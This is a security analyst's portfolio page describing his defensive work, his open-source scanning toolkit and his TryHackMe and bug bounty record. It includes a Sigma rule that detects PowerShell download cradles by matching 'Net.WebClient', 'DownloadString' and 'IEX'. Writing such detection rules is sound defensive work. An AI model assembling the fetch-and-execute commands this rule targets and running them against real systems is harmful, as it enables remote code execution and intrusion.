Junior SOC analyst / blue team

Bartosz Reślinski

last detection rule shipped - 6d ago

I build ShieldEye - four open-source security tools for attack surface mapping, code analysis, network scanning and compliance. Defensive work by day, the toolkit is where I turn the repetitive parts into something reusable.

View the toolkit GitHub

Top 1% TryHackMe, global
#1 TryHackMe, Poland
4 open-source tools
HackerOne · Intigriti bug bounty

detections/win_susp_ps_cradle.yml

title: PowerShell Download Cradle
status: experimental
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'Net.WebClient'
            - 'DownloadString'
            - 'IEX'
    condition: selection
level: high

What I do

Three angles on the same problem: keeping systems defensible.

defense

Detection & response

Day-to-day blue team work: writing Sigma rules, triaging alerts, and running a self-hosted Wazuh SIEM against real telemetry from a Windows endpoint with Sysmon.

tooling

Security tooling

Turning recurring tasks into reusable tools. Four scanners so far, each covering a different layer: external surface, source code, network, compliance. All open source, all MIT.

offense

Offensive practice

Keeping the attacker view sharp through TryHackMe (top 1% globally, #1 in Poland) and bug bounty on HackerOne and Intigriti. That perspective feeds back into what the defensive tools actually need to catch.

The toolkit